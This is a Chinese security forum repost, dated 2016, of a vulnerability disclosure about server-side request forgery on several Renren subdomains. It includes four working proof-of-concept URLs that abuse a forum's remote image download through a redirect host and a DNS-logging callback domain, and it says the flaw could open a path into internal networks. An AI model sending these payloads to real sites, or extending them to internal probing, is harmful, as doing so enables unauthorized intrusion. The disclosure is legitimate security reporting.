HanDs
管理员

[7月漏洞公开] 人人网几处站点存在SSRF漏洞 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

用ssrf渗透内网需要技术呀。。

详细说明:

参考:http://wooyun.org/bugs/wooyun-2010-0215779



看猪哥的文档说,可以使用ssrf进行内网渗透,利用跳转来进行其他协议探测是一个不错的姿势。



code 区域
http://war.gamebbs.renren.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://localhost-9200.com/302.php?url=http://renren.22e642.dnslog.info/?data=helo.jpg[/img]

http://kd.gamebbs.renren.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://localhost-9200.com/302.php?url=http://renren4.22e642.dnslog.info/?data=helo.jpg[/img]


http://fans.renren.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://localhost-9200.com/302.php?url=http://renren.22e642.dnslog.info/?data=helo.jpg[/img]

http://gamebbs.renren.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://localhost-9200.com/302.php?url=http://renren.22e642.dnslog.info/?data=helo.jpg[/img]





漏洞证明:





ssrf.jpg

修复方案:

禁止访问。


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
人人 站点 存在 S SR F 漏洞
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组
快速回复